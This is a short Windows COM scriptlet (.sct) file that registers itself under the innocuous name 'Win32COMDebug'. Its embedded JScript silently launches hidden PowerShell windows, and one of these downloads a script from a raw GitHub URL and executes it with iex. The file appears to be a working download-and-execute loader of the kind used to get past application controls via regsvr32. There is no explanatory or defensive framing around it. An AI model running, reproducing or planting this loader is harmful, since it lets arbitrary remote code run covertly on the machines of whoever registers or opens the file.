<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA0111-0000-0000-0000-0000FEEDACDC}"
 >
 <script language="JScript">
      <![CDATA[
	   var a = new ActiveXObject("WScript.Shell").Run("powershell.exe -NoP -sta -NonI -W Hidden -c (start-process -filepath https://www.baidu.com); iex",0);
      	   var r = new ActiveXObject("WScript.Shell").Run("%windir%\\sysWOW64\\WindowsPowerShell\\v1.0\\PowerShell.exe -NoP -W Hidden -c \"iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Whatisitwhy/say/master/gitup.data');\"",0);
	   
      ]]>
 </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
</scriptlet>
